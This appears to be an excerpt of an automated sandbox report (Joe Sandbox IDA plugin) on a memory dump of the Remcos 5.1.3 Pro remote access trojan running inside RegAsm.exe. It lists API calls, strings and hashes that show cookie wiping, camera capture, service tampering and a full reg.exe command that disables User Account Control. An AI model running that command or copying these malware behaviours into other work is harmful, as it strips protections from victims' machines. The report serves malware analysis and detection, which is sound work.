                                                                                                        • Instruction ID: e4e7d1672fbddd81374e29e92f863be8f9bad83f72bb7a306ddb251afa86686e
                                                                                                        • Opcode Fuzzy Hash: d877cea0863f9d3afa12868748af2f8600b5022738d517222c004e226c4c5a05
                                                                                                        • Instruction Fuzzy Hash: 4501D272B087116BE2246B65DC4AF6B3748DB41B25F11053FF901A62C1EAB9FC0146AB
                                                                                                        APIs
                                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BB18
                                                                                                        • GetLastError.KERNEL32 ref: 0040BB22
                                                                                                        Strings
                                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAE3
                                                                                                        • UserProfile, xrefs: 0040BAE8
                                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB48
                                                                                                        • [Chrome Cookies not found], xrefs: 0040BB3C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileLast
                                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                        • API String ID: 2018770650-304995407
                                                                                                        • Opcode ID: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                        • Instruction ID: 5dee569c6883bfd73109a670bb68234af0f28e4caad238985ba957b2c74b96e7
                                                                                                        • Opcode Fuzzy Hash: 7f227baf29ba8510fc9076d17c15206364f61269e19861644170f4ec6218b3ea
                                                                                                        • Instruction Fuzzy Hash: 5B01DF71A402055BCA04B7B6CC1B9BE7B24E922704B50017FF502726D6FE3E5D0986CE
                                                                                                        APIs
                                                                                                        • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                        • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Console$AllocOutputShowWindow
                                                                                                        • String ID: Remcos v$5.1.3 Pro$CONOUT$
                                                                                                        • API String ID: 2425139147-2212855755
                                                                                                        • Opcode ID: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                        • Instruction ID: 6efa3de70d430de9448838496adf33c47162c0890a3ad1875f095e209401f165
                                                                                                        • Opcode Fuzzy Hash: bb520a2f19826cc6a1c283625bbcfbf44085728638f029a4a140c4eec348b460
                                                                                                        • Instruction Fuzzy Hash: A90144B1A80304BBD610F7F19C8BF9E77AC9B14B05F500527BA04A70D2EB6DD944466E
                                                                                                        APIs
                                                                                                        • __allrem.LIBCMT ref: 0043ACE9
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD05
                                                                                                        • __allrem.LIBCMT ref: 0043AD1C
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD3A
                                                                                                        • __allrem.LIBCMT ref: 0043AD51
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AD6F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1992179935-0
                                                                                                        • Opcode ID: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                        • Instruction ID: c7cd181284538591ee8af1586cca3d38175ba7b34bac8e5aa56d350f01832762
                                                                                                        • Opcode Fuzzy Hash: 3b7debe300bd30616e6d17b60b5e1d5511deed8aaa3e59a787e888dcedb96ab2
                                                                                                        • Instruction Fuzzy Hash: 5F815972A40B05ABE7209F29CC41B6FB3A99F48324F24152FF591D67C1E77CE910875A
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000000,0040D29D), ref: 004044C4
                                                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: H_prologSleep
                                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                                        • API String ID: 3469354165-3054508432
                                                                                                        • Opcode ID: 93b3152543f0af9eb27cbcf260c2febee2ff7f26862d49d262bc6a1801302720
                                                                                                        • Instruction ID: df1e58e957a7578ae16e417911435538e3341edc64810737793f4aa4f8849b6c
                                                                                                        • Opcode Fuzzy Hash: 93b3152543f0af9eb27cbcf260c2febee2ff7f26862d49d262bc6a1801302720
                                                                                                        • Instruction Fuzzy Hash: A751E171A042106BCA14FB369D0A66E3755ABC4748F00443FFA0A676E2DF7D8E45839E
                                                                                                        APIs
                                                                                                          • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                                        • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                                        • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                                        • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                                          • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                                        • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                                          • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                                          • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 3950776272-0
                                                                                                        • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                        • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                                        • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                                        • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe
                                                                                                        • String ID:
                                                                                                        • API String ID: 4189289331-0
                                                                                                        • Opcode ID: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                        • Instruction ID: b93b8478136607885b926496a305f1bfb884a7f6acf724e610c81469f19cb9e5
                                                                                                        • Opcode Fuzzy Hash: df708042516445aa89903c6330052172adb2df4233c064de01baf1be20d0a2ef
                                                                                                        • Instruction Fuzzy Hash: 2551FD72500605ABFF209B598C81EAF77A8EF45334F25421FF915A6293DB3DD900C66D
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD19
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A41F,00000000), ref: 0041AD2D
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD3A
                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A41F,00000000), ref: 0041AD6F
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD81
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A41F,00000000), ref: 0041AD84
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 493672254-0
                                                                                                        • Opcode ID: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                        • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                                                                                        • Opcode Fuzzy Hash: f0f747c63b9e12e72378a2591e571a85e7fda5b6d41ee6cbe89889ce84539f3f
                                                                                                        • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                        • _free.LIBCMT ref: 004482CC
                                                                                                        • _free.LIBCMT ref: 004482F4
                                                                                                        • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                                                        • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                        • _abort.LIBCMT ref: 00448313
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                        • String ID:
                                                                                                        • API String ID: 3160817290-0
                                                                                                        • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                        • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                                                                                        • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                                                                                        • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                        • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                                                                                        • Opcode Fuzzy Hash: 754c0925ec177a5049a93b7fce8159a8319844bdb89c9ef35b94d9fd17db8e33
                                                                                                        • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                                                                                        • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                        • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                                                                                        • Opcode Fuzzy Hash: b5aa101f668b8370ae1db4d78aefdcb1539b90a750a7e22220e005daec647db2
                                                                                                        • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                                                                                        APIs
                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                                                                                        • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                        • String ID:
                                                                                                        • API String ID: 221034970-0
                                                                                                        • Opcode ID: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                        • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                                                                                        • Opcode Fuzzy Hash: d2f399c3bcd0f1044f14c411125fc5822346b4401d7891a80fcd35a5d0c32c00
                                                                                                        • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                        • String ID: 0$MsgWindowClass
                                                                                                        • API String ID: 2877667751-2410386613
                                                                                                        • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                        • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                        • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                        • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                        Strings
                                                                                                        • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                        • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle$CreateProcess
                                                                                                        • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                        • API String ID: 2922976086-4183131282
                                                                                                        • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                        • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                        • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                        • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                                                                                        Strings
                                                                                                        • SG, xrefs: 00407715
                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076FF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        • API String ID: 0-643455097
                                                                                                        • Opcode ID: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                        • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                        • Opcode Fuzzy Hash: 9875d9faf70918787a925bf8ffd0fe05ff0f1e0d4d07a7049234b56cd1ae4be9
                                                                                                        • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                        APIs
                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 004433FA
                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,0044338B,?,?,0044332B,?), ref: 0044340D
                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,0044338B,?,?,0044332B,?), ref: 00443430
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                        • Opcode ID: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                        • Instruction ID: d7bd46dfab834bb5d48edea7818df211002af85bf4a2e706b61bd78119be3437
                                                                                                        • Opcode Fuzzy Hash: ffd65e2a986ef432bd98aae630379cdfc9b477bc787d361fad657d5437817096
                                                                                                        • Instruction Fuzzy Hash: 4EF04931900208FBDB159F65DC45B9EBF74EF04753F0040A5F805A2251DB758E40CA99
                                                                                                        APIs
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                        • String ID: KeepAlive | Disabled
                                                                                                        • API String ID: 2993684571-305739064
                                                                                                        • Opcode ID: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                        • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                        • Opcode Fuzzy Hash: 1fd388f523b344ad3ce7bacd9f737274470046df98bc8577e1acfe76f453cfe4
                                                                                                        • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                        • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                        • String ID: Alarm triggered
                                                                                                        • API String ID: 614609389-2816303416
                                                                                                        • Opcode ID: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                        • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                        • Opcode Fuzzy Hash: 715f6b18c41aa76fa9a4930845716c072d9d24f9be949641e6571375284beb95
                                                                                                        • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                        APIs
                                                                                                        • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                        • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CE00
                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CE0D
                                                                                                        • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CE20
                                                                                                        Strings
                                                                                                        • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                        • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                        • API String ID: 3024135584-2418719853
                                                                                                        • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                        • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                        • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                        • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                        • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                        • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                                                                                        • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                        APIs
                                                                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
